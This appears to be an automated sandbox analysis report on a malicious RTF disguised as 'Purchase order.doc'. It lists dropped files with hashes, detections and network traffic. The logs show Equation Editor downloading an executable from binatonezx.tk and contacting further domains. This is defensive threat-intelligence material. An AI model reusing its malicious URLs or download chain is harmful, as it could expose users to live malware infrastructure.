                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 533504
Entropy (8bit): 7.535605271538659
Encrypted: false
SSDEEP: 6144:qY6tTkkAiotWImLrfqldKQgpvXgfcJHSZU4qZYdNsagHan0BE8bPzNGq+mC3YS0b:YBImHHQ42ISNqFag6n0Bh7Nz+ma2
MD5: E78C85674617F34A2F69FFC8DA6A3C48
SHA1: 9BFA82536DC11203B91441158DC5B8752126402E
SHA-256: 342BAC531D9B15D642629E91AF8944289AF752DD5D70C687E39CEFE9A14DC81D
SHA-512: 982E4325121967576F12EC8710E4397E0118B41524ED14F7581F44B5641BB7B574E2A64F01F3B132D595058E0D76F822AE7D197AF6290CEA9F19F86A9FEB27CE
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 38%
Reputation: low
IE Cache URL: http://binatonezx.tk/villarzx.exe
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 177152
Entropy (8bit): 7.970411716686075
Encrypted: false
SSDEEP: 3072:cr+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:cx27JkSS6KNZSXVnWSoaKam
MD5: 808C3076CEA76ACAF4CE2218088D1F91
SHA1: FC4D7C9881D7252978C55CA0CB181CC894B7F247
SHA-256: 53D4A9BB3433619E3E72AB49B22CF6CF2C48A6B34FF2DFBA295D8D9E0C703436
SHA-512: D756F0159282D142FC348541102BC60BC742E3845D269D6A2D57111CBFA0DFCC2C8EB193E36A9CC9F60FFB901FC47430660C1DB40CC88E1E72D17F4CB699F41C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AC3AA43-F534-4DDB-AF6A-E52603844969}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE200956-F676-4F00-A1C2-2784A0C388FF}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 13312
Entropy (8bit): 3.5651044838041828
Encrypted: false
SSDEEP: 384:qeOuKpy4UFilNuoxijZcwINCZDLRdHNYZ:qehK8jFilN9xUZcFkZDLRdHNYZ
MD5: 8D48293FF3DF3084EA6F2A671CBB7364
SHA1: 4DDFE751D6C3A665CD8BF35317E3EB893EF248A3
SHA-256: 8C6C35A0E9F2D6724677D1EBA39707B86CCB5FE5DDD31B6B0FC88EE5EE31D430
SHA-512: 177025E887A9E9E643D0A25FFB11A2FFF01D7361717810E83E14C9EC92624570695770AA39D02E674A3DCA74030F4DFD5B080C1317A19842CB6CE91F7C2AA70D
Malicious: false
Reputation: low
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7122D4A-0A99-4D1B-A260-A7FE10FBEC45}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007243
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbH:IiiiiiiiiifdLloZQc8++lsJe1MzQ
                                              MD5:BA8C943012DEE7467DE3D83DA2828CB3
                                              SHA1:9BF9A5BD82BF4512F5E106E584B62321C0BC0CA8
                                              SHA-256:13C424963F6EFD1B2101805A2A260B35C852F96C34015C747E47A11DD057E6A8
                                              SHA-512:4A6523236AEF44C2374E7C982898D9AB71EFCC3C87DD4CD22E43A31451088DFA05F9580815681C460B8BDAF3DFBF1902420125C23ED1D9B8E189C3321015508F
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase order.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:38:18 2021, length=532611, window=hide
                                              Category:dropped
                                              Size (bytes):1034
                                              Entropy (8bit):4.538266037575395
                                              Encrypted:false
                                              SSDEEP:12:8SX0e0EtgXg/XAlCPCHaXeBhB/a/X+WOZU2+5jicvbrCNAsn0Is55DtZ3YilMMEK:8SX0O/XTuzIcckevq/A3Dv3qVE/7Eg
                                              MD5:731A1C224809E23D6D2AA8A7236E4EC2
                                              SHA1:10953EEBFB40781CADD8ED80928F63ED7A1DA962
                                              SHA-256:CDA5C7B062C04D2EBB818D60B955EEE04A50F3ECD3C8CF8105AC4A0683EE93DC
                                              SHA-512:6AAE94909EEB6A3A33C44097F4B9CFC1AD9656CAB96F07D910A1B82080843A540B5A7570DC314ECD7012CC4B14483C55A271C7C295531ABF1F485A3A43DB4471
                                              Malicious:false
                                              Preview: L..................F.... ......?......?...?B'...... ...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.. ..[S. .PURCHA~1.DOC..R.......S ..S .*.........................P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\Purchase order.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9..g............[D_
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):79
                                              Entropy (8bit):4.549839610519029
                                              Encrypted:false
                                              SSDEEP:3:bDuMJlt34KRAXdrFomX1aWN4KRAXdrFov:bCmoAAXd5yNAAXd5y
                                              MD5:BB79F1241DACCBC8C081EF907446DF67
                                              SHA1:A57670C3D8F3E52BDCD51C7993433291B1F6A50F
                                              SHA-256:ED8DF729758B4781973C7A4798964CE386E6E707EBFB2F7ECD67F3C6FC109785
                                              SHA-512:463D7A0B1C98AA5E46E6827CD4A62A48EDB7C4E9F76DB943730CB3B88440DCED863FBEA1EA6E3C878302E810A2A6C750D99F49977B4313216715BA01F0FB378C
                                              Malicious:false
                                              Preview: [folders]..Templates.LNK=0..Purchase order.LNK=0..[doc]..Purchase order.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\villar8681.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):533504
                                              Entropy (8bit):7.535605271538659
                                              Encrypted:false
                                              SSDEEP:6144:qY6tTkkAiotWImLrfqldKQgpvXgfcJHSZU4qZYdNsagHan0BE8bPzNGq+mC3YS0b:YBImHHQ42ISNqFag6n0Bh7Nz+ma2
                                              MD5:E78C85674617F34A2F69FFC8DA6A3C48
                                              SHA1:9BFA82536DC11203B91441158DC5B8752126402E
                                              SHA-256:342BAC531D9B15D642629E91AF8944289AF752DD5D70C687E39CEFE9A14DC81D
                                              SHA-512:982E4325121967576F12EC8710E4397E0118B41524ED14F7581F44B5641BB7B574E2A64F01F3B132D595058E0D76F822AE7D197AF6290CEA9F19F86A9FEB27CE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 38%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0..............6... ...@....@.. ....................................@..................................5..O....@..(....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..B.................5......H...................t....|.............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$rchase order.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.010742433150536
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:Purchase order.doc
                                              File size:532611
                                              MD5:b0e95a4af180627b781257494c5bd43b
                                              SHA1:a660ad6781f25a7a3ce699751495f0cb2adf7196
                                              SHA256:51d82db8f2b1b3d5387e3c400b1a3ad27371e4340343aa4affe4165d51334d90
                                              SHA512:cfca9ff89cbc1bdf2f63c47b4e6b5fdb09af813e357ca9fe07ef26cb48d3aa65cccd32ac96814b36481fe20af5d0342dfe1ed423f607c64a7f9d22954b3f321f
                                              SSDEEP:12288:Mq/DepHZjIfzrFqYq7aycaNwDTxDREZSBIihUZUz:7GpIrMvcysTpaihUez
                                              File Content Preview:{\rtf5477%..`.2[+0)^8[64'5!8~|1(0?|[641-?<?);?3%??2&|#?$?!;`?^)~_]/5)1%`6&9?.?&^.29;#;0=@?;5?.@~.-%/:?^&.[@~%.=`%~7|`%?5'<.;+%-78*7?%[*6![]|](~+-6<%2]0_9?]`|^?745.=]1[9(-.-.]@:31?3.-#@^2@_/?9&.?2%|.4??%:;7,3.?)%-#6+!?5.1!9<+|?*];&^^8<`6>)8'`$%9!7(`.#]2(3@

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              0000018F7hno
                                              1000018BFhno

                                              Network Behavior

                                              Snort IDS Alerts

                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              10/27/21-16:40:39.297759 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 50591 | 8.8.8.8 | 192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 27, 2021 16:39:11.693308115 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.721389055 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.721467018 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.721872091 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.752553940 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.753971100 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754014969 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754054070 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754090071 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754093885 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754132986 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754143000 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754153967 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754169941 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754201889 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754208088 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754230976 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754247904 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754265070 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754287958 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754323959 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754326105 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.754342079 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.754374027 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.774081945 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782649994 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782691956 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782716036 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782740116 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782749891 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782764912 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782779932 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782783031 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782785892 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782788992 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782793045 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782820940 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782830954 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782846928 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782856941 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782872915 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782881975 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782898903 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782908916 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782928944 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782937050 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782954931 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782965899 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.782982111 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.782991886 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783009052 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783013105 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783035994 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783040047 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783061981 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783071041 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783087969 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783096075 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783114910 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783126116 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783143044 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783153057 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783169985 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.783179998 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.783200026 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.786727905 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.810794115 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.810826063 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.810847044 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.810866117 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.810924053 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.810956001 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813731909 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813766003 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813797951 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813808918 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813829899 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813853979 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813859940 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813870907 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813874960 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813889980 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813915014 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813915968 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813944101 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813946009 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.813960075 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.813977957 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814008951 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814032078 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.814037085 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.814039946 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814071894 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814100027 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.814101934 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814135075 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.814136982 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814141035 CEST | 49167 | 80 | 192.168.2.22 | 2.56.59.211
                                              Oct 27, 2021 16:39:11.814163923 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22
                                              Oct 27, 2021 16:39:11.814189911 CEST | 80 | 49167 | 2.56.59.211 | 192.168.2.22

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 27, 2021 16:39:11.637491941 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 27, 2021 16:39:11.675817966 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                              Oct 27, 2021 16:40:39.274214029 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 27, 2021 16:40:39.297759056 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                              Oct 27, 2021 16:40:56.300431967 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 27, 2021 16:40:56.351763010 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
                                              Oct 27, 2021 16:41:16.763684034 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 27, 2021 16:41:16.787118912 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Oct 27, 2021 16:39:11.637491941 CEST | 192.168.2.22 | 8.8.8.8 | 0xdf6c | Standard query (0) | binatonezx.tk | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:39.274214029 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.filecrev.com | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.300431967 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.charlotte-s-creations.com | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:41:16.763684034 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.tapehitsscriptsparty.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Oct 27, 2021 16:39:11.675817966 CEST | 8.8.8.8 | 192.168.2.22 | 0xdf6c | No error (0) | binatonezx.tk | | 2.56.59.211 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:39.297759056 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.filecrev.com | | 202.165.66.108 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | www.charlotte-s-creations.com | ssl2.site123.com | | CNAME (Canonical name) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | ssl2.site123.com | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | | 54.156.84.168 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | | 54.145.162.195 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | | 3.87.84.223 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | No error (0) | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | | 54.157.107.32 | A (IP address) | IN (0x0001)
                                              Oct 27, 2021 16:41:16.787118912 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | Name error (3) | www.tapehitsscriptsparty.com | none | none | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk
                                              • www.filecrev.com
                                              • www.charlotte-s-creations.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.22 | 49167 | 2.56.59.211 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 27, 2021 16:39:11.721872091 CEST | 0 | OUT | GET /villarzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
                                              Oct 27, 2021 16:39:11.753971100 CEST | 2 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:39:11 GMT
